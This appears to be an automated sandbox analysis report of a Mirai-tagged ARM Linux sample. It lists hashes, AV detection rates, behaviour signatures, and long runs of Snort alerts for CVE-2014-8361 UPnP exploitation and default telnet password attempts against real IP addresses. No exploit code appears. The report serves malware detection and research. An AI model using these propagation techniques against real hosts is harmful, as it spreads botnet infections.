Linux Analysis Report Hilix.arm

Overview

General Information

Sample Name: Hilix.arm
Analysis ID: 513293
MD5: 9653f94dca32a23046c21ffeea172dd6
SHA1: a7037a2353ddf06c10144563b077c906b92ebbfa
SHA256: dcd35159cd640f9b66aad91d5dc7d1e81fffd2478c1e44e0f3184db70285040f
Tags: Mirai

Detection

Mirai
Score: 76
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Uses known network protocols on non-standard ports
Sample tries to kill many processes (SIGKILL)
Connects to many ports of the same IP (likely port scanning)
Sample has stripped symbol table
HTTP GET or POST without a user agent
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)

AV Detection:

Multi AV Scanner detection for submitted file
Source: Hilix.arm Virustotal: Detection: 53%
Source: Hilix.arm ReversingLabs: Detection: 63%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44512 -> 91.76.221.44:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44512 -> 91.76.221.44:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38810 -> 185.133.76.118:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44516 -> 91.76.221.44:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43818
Source: Traffic Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:60820
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 14.186.40.42:23 -> 192.168.2.23:60836
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 14.186.40.42:23 -> 192.168.2.23:60836
Source: Traffic Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35694
Source: Traffic Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53422
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:35694 -> 12.132.185.90:23
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43818
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43818
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53182 -> 45.158.20.52:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53182 -> 45.158.20.52:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:60900
Source: Traffic Snort IDS: 716 INFO TELNET access 41.60.156.81:23 -> 192.168.2.23:47878
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:60900 -> 189.112.111.254:23
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35694
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35694
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:35168 -> 2.196.131.42:23
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58264 -> 45.152.216.70:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58264 -> 45.152.216.70:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39908 -> 45.195.9.140:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39908 -> 45.195.9.140:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:60900
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58596 -> 45.133.119.108:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58596 -> 45.133.119.108:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58598 -> 45.133.119.108:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:60978
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37414 -> 45.115.237.160:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37414 -> 45.115.237.160:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53524
Source: Traffic Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35800
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52734 -> 185.242.232.109:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52734 -> 185.242.232.109:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60204 -> 91.77.213.224:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60204 -> 91.77.213.224:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60208 -> 91.77.213.224:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52738 -> 185.242.232.109:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58506 -> 91.76.227.42:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58506 -> 91.76.227.42:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58508 -> 91.76.227.42:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:60978
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35800
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35800
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:36156 -> 14.250.139.253:23
Source: Traffic Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32782
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 14.250.139.253:23 -> 192.168.2.23:36156
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 14.250.139.253:23 -> 192.168.2.23:36156
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34670 -> 91.78.78.126:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34670 -> 91.78.78.126:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37990 -> 185.147.57.109:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37990 -> 185.147.57.109:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34680 -> 91.78.78.126:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37994 -> 185.147.57.109:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34742 -> 45.121.57.150:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34742 -> 45.121.57.150:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41400 -> 45.124.201.26:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41400 -> 45.124.201.26:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42850 -> 45.33.242.186:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42850 -> 45.33.242.186:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39702 -> 45.41.93.77:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39702 -> 45.41.93.77:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41416 -> 45.124.201.26:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:32782
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41654 -> 45.42.86.88:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41654 -> 45.42.86.88:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51620 -> 185.142.143.64:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51620 -> 185.142.143.64:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44520 -> 45.250.172.36:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44520 -> 45.250.172.36:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 14.249.147.18:23 -> 192.168.2.23:58760
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 14.249.147.18:23 -> 192.168.2.23:58760
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51628 -> 185.142.143.64:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35908
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39498 -> 91.78.44.126:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39498 -> 91.78.44.126:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 64.85.48.118:23 -> 192.168.2.23:33864
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 64.85.48.118:23 -> 192.168.2.23:33864
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39502 -> 91.78.44.126:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56918 -> 45.254.24.180:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56918 -> 45.254.24.180:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53696 -> 185.114.78.45:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53696 -> 185.114.78.45:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53160 -> 45.42.86.243:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53160 -> 45.42.86.243:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53706 -> 185.114.78.45:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32888
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33774 -> 185.229.200.212:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33774 -> 185.229.200.212:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45424 -> 91.77.218.117:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45424 -> 91.77.218.117:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49110 -> 45.152.216.217:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49110 -> 45.152.216.217:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45428 -> 91.77.218.117:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33780 -> 185.229.200.212:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49118 -> 45.152.216.217:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35908
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35908
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36092
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36092
Source: Traffic Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:32888
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 209.166.92.105:23 -> 192.168.2.23:58372
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 209.166.92.105:23 -> 192.168.2.23:58372
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42818 -> 45.134.145.252:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42818 -> 45.134.145.252:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36100
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36100
Source: Traffic Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32918
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34728 -> 185.65.160.215:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34728 -> 185.65.160.215:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34730 -> 185.65.160.215:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60418 -> 45.116.212.241:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60418 -> 45.116.212.241:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 41.60.156.81:23 -> 192.168.2.23:48138
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36118
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36118
Source: Traffic Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35982
Source: Traffic Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:32918
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48884 -> 91.214.119.42:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48884 -> 91.214.119.42:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48888 -> 91.214.119.42:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44294 -> 45.45.156.148:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44294 -> 45.45.156.148:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44296 -> 45.45.156.148:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58534 -> 45.77.191.125:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58534 -> 45.77.191.125:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58544 -> 45.77.191.125:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36144
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36144
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35982
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35982
Source: Traffic Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32974
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 14.186.40.42:23 -> 192.168.2.23:32944
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 14.186.40.42:23 -> 192.168.2.23:32944
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38632 -> 185.71.67.178:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38632 -> 185.71.67.178:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58818 -> 91.78.174.248:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58818 -> 91.78.174.248:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38636 -> 185.71.67.178:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58830 -> 91.78.174.248:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41760 -> 45.33.250.8:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41760 -> 45.33.250.8:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36176
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36176
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:58120 -> 178.72.106.93:23
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44938 -> 91.121.37.138:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44938 -> 91.121.37.138:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43230 -> 91.76.197.73:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43230 -> 91.76.197.73:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43234 -> 91.76.197.73:52869
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52752 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52754 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53796 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57990 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57992 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42006 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42010 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55814 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55818 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56644 -> 52869
